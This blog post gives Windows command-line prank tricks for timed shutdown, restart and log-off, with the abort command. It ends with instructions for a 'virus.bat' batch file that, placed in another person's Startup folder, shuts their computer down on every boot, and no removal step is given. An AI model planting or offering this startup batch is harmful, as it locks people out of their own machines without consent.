• About
  • Contact

Things For Computers

  • Home
  • Earn Money
    • Free Lance
    • 13 Trusted Sites to Make Money
  • Tricks
    • Faceook Tricks
    • Computer Tricks
    • Internet Tricks
    • Blogger Tricks
    • Chrome Tricks
    • Firefox Tricks
    • Funny Tricks
    • Google Tricks
    • Hacking Tricks
    • Notepad Tricks
    • Virus Tricks
    • Youtube Tricks
    • Whatsup Tricks
    • Amazon Tricks
    • Alexa Tricks
  • Free Internet
    • Mobilink Tricks
    • Zong Tricks
    • Telenor Tricks
    • Ufone Tricks
    • Warid Tricks
    • Airtel Tricks
  • Softwares
    • Latest Softwares
    • Utility Softwares
    • Computer Software
  • Blogging
    • Blogging Tips
    • Blogger Tricks
    • Blogger Widgets
    • Blogger Templates
Home » Computer Tricks » Latest Computer Shutdown And Restart Amazing Trick - Full Tutorial

Latest Computer Shutdown And Restart Amazing Trick - Full Tutorial

Hasan
Add Comment
Computer Tricks

Latest Computer Shutdown And Restart Amazing Trick - Full Tutorial
My Exclusive... Again a contribution to Computer Tricks !
Play pranks on your friends...

----------------------
Shutdown Trick
Stimulate shutdown from command prompt !
# Start >> Run
# Type shutdown -s -t 10 -c "Shutting Down..."
# Hit Enter and enjoy !
----------------------
Restart Trick
Stimulate Restart from command prompt !
# Start >> Run
# Type shutdown -r -t 10 -c "Restarting..."
# Hit Enter and enjoy !
--------------------
Log Off TrickStimulate LogOff from command prompt !
# Start >> Run
# Type shutdown -l
# Hit Enter and enjoy !
----------------------

Please Note

-s :: This signify Shutdown Request.
-r :: This signify Restart Request.
-l :: This signify LogOff Request.
-t :: This signify the timer before Restart. (Replace '10' with any number.)
-c :: This signify comment.

How To Stop It ?# When the timer is Running...
# Start >> Run
# Type shutdown -a
# That's It.

Prank !!!
-------------------------------------------------------------
۩ We can make a batch file which will Shutdown the computer everytime on startup !
Here is how ?
► Open Notepad
► Type :
@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit
► File >> Save As...
► Name it : virus.bat
► Start >> All Programs
► Right Click on Startup >> Open
► This open the Startup folder
► Paste the Virus.bat file here !
*** That's all , now the computer will automatically shutdown on every startup !
---------------------------------------------------------------------------------

Please Comment...
Tweet
Latest Computer Shutdown And Restart Amazing Trick - Full Tutorial Title : Latest Computer Shutdown And Restart Amazing Trick - Full Tutorial
Description : My Exclusive... Again a contribution to Computer Tricks ! Play pranks on your friends... ---------------------- Shutdown Trick Stimulate ...
Rating : 5

0 Response to "Latest Computer Shutdown And Restart Amazing Trick - Full Tutorial"

← Newer Post Older Post → Home
Subscribe to: Post Comments (Atom)

Back to top!